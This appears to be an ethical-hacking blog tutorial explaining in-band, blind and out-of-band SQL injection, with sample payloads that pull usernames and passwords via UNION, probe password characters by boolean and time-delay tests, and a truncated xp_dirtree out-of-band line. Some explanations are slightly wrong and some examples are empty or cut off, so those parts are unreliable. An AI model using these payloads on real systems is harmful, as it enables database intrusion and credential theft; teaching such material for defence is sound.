Home Ethical Hacking What is SQL Injections and Types of SQL injection?

What is SQL Injections and Types of SQL injection?


SQL injection is a web application vulnerability that allows an attacker to inject SQL queries in an application that is executed in its database. It generally allows an attacker to view restricted sensitive data. This might include data belongs to other users, it can be user passwords or any sensitive information. In many cases, an attacker can delete or modify this data.

SQL injections typically fall into three categories as listed below:

  1. In-band SQLi (Classic)
  2. Inferential SQLi (Blind SQL Injection)
  3. Out-of-band SQLi.

SQL injections types are defined as per the methods or techniques they use to access backend data and their damage potential.

In-band SQLi

In-band SQL Injection is the very most common and easy-to-exploit SQL Injection attack.

In this type, the attacker uses the same mode of communication to start attacks and to collect their results.

This is further divided into two sub-variations:

  • Error-based SQLi—In Error-based SQLi, the attacker basically depends upon the error message thrown by the database server to obtain critical information. The attacker performs a action that cause the database to result an error messages. This injection attack alone is enough for an attacker to enumerate an entire database and collect sensitive information.
Example - 
  • Union-based SQLi—In Union-based SQLi, attacker leverages advantage of the UNION SQL operator, which makes multiple select statements executed by the database and combine the results in one and return as HTTP response. This response may carry sensitive information which can be leveraged by the attacker.
Example - 
' UNION SELECT username, password FROM users--
' UNION SELECT username || '~' || password FROM users--
SQL Injection Attack

Inferential SQLi (Blind SQLi)

This method is named blind SQLi because, There is no data actually transferred over the web application, so the attacker would not be able to receive the result of an attack. Here, the attacker sends data as a payload to the server and observes the response and behavior of the server to find out more about its structure.

Blind SQL injections are further classified as follows:

  • Boolean Based Blind SQLi—In this the attcker sends conditional payload based SQL Query to the server and receives a true or false result. Depending on the result, the responce within the HTTP response will change, or remain the same. This allows an attacker to validate if the sent payload returned true or false. And with way the attacker can validate if the injected data is correct or not.
Example -
xyz' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') THEN 1/0 ELSE 'a' END FROM Users)='a

This checks if the first latter of password contains 'a' or not, This way we can validate all the letters and all the positions of password and enumurate the data.
  • Time-based —In this the attcker sends databse wait based SQL Query to the server and makes the server waits for the given time before it response. Using this the attacker can validate whether a question is true or false. If the server waits for the given time by the attacker, then the given statement is true and if not wait then the statement is false. Even no data from the database is returned the attacker can able to enumurate the database. although this process is very slow, because an attacker would need to enumurate character by character which takes a lot time.
'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--

Out-of-band SQLi

The attacker can only perform this attack when related features are enabled on the database server that is used by the online application. this type of attack is mainly used as an alternate to the Blind SQLi and in-band techniques, especially if the server responses are not very stable which makes time-based attacks unreliable.

Out-of-band SQLi techniques would depend on the database server’s ability to make HTTP or DNS requests to deliver data to an attacker.

Example - 
'; exec master..xp_dirtree 



Please enter your comment!
Please enter your name here

Exit mobile version